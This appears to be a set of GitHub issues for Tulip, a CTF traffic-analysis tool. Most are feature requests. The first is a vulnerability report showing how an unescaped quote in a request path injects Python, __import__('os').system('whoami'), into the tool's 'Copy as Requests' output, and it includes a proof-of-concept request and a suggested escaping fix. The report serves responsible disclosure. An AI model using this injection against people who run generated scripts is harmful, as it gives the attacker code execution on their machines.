Steps to reproduce

1. Send a request with " in the URL (not url escaped) and your payload you want to run as python3 code
2. Wait for someone to "Copy as Requests" and run your script like a normal attacker would
3. Pop their host

The chances of someone exploiting this are quite low - as it relies on them not seeing the command injection in the "Copy as ..." script. Also in pretty much every CTF this would violate the rules.

Fix

Recommend escaping " characters (or preventing them entirely) in certain request properties or use another way of generating the templates as there is likely other places where this is an issue. Could use repr to add the quote characters and escape automatically like this

print(repr("a\"\'b"))
'a"\'b'

Example

Request (screenshot)

Request (python3 code)

req = (
    f'GET /"+__import__("os").system("whoami")+"/path HTTP/1.1\n'
    f'Host: 192.168.1.107:1337\n'
    f'\n'
)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.1.107', 1337))
sock.sendall(req.encode())
res = sock.recv(4096)
print(res.decode())

Copy as Requests Output (note the command injection in the request.path)

import os
import requests
import sys

host = sys.argv[1]

s = requests.Session()


s.headers = {}

data = {}
s.get("http://{}:1337/"+__import__("os").system("whoami")+"/path".format(host), data=data)

The volume graph is useful to detect the volume associated with certain tags / search queries.

The current implementation in devel is pretty naive and just uses a fixed window size. This should be done dynamically based on the timestamps of the first and last item.

Currently Tulip shows the path of the PCAP associated with a TCP flow.
It would be nice to change this to a hyperlink pointing to the PCAP, enabling other team members to download it for local analysis.

Should we allow the backend to access PCAPs path to serve it to other users?

Hello 👋

I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@erdnaxe) has found a potential issue, which I would be eager to share with you.

Could you add a SECURITY.md file with an e-mail address for me to send further details to? GitHub recommends a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future.

Looking forward to hearing from you 👍

(cc @huntr-helper)

Starring a flow currently does not update the frontend until a refresh is triggered in the devel branch.

Currently Tulip adds a FLAG label on a flow when the flag regex has one or more match.
It would be useful to store how many times the regex matched the TCP data, then display it like FLAG x3.

This could be useful to spot unusual amount of flags in a TCP flow.

For some specific HTTP requests, the cookie tracking panics the assembler. I have pcaps from BambiCTF that trigger this bug, so I will try to find an example and create a test for it.

During FAUST CTF 2022 there were one service called Ghost which was sending SYN to the vulnbox.
This could be spotted using WireShark.

This is hard to solve as we mostly don't want to bloat Tulip, but maybe something could be done to represent "incomplete TCP flows and UDP" data from PCAPs inside Tulip?

Not all CTF's maintain flag format over different services. It would be good to either define a global flag format or define format (based on regex) per service, preferably in configurations.py with the services definitions

Currently Tulip shows WebSocket streams as TCP streams.
It would be nice to format WebSocket streams like browser developer consoles do.

WebSocket can send packet in text mode or binary mode. For binary mode we could use an alternate representation.

This needs discussion as we mostly don't want to bloat Tulip.
It would be nice to have a /metrics endpoint in the backend following the OpenTelemetry format.
This could allow teams to monitor their instance and be alerted when something very wrong is happening (before the scoreboard).

Metrics wishlist:

• (Counter per service) Total count of TCP flows in the MongoDB
• (Counter per service) Total size in bytes of all payloads in the MongoDB
• (Counter per service) Total amount of FLAG OUT / IN
• (Counter) Total amount of backend API requests
• (Gauge) Average duration of backend API response time

I don't believe we should expose per-TCP flow information as the Tulip frontend is already made for that.

As far as I am aware, Tulip is unable to detect a flag leaking in base64 format.

Maybe something could be done inside the assembler to detect valid base64 strings in the payload (regex?), decode then and then try to match the flag regex to this data.

The same applies for hexadecimal byte-strings.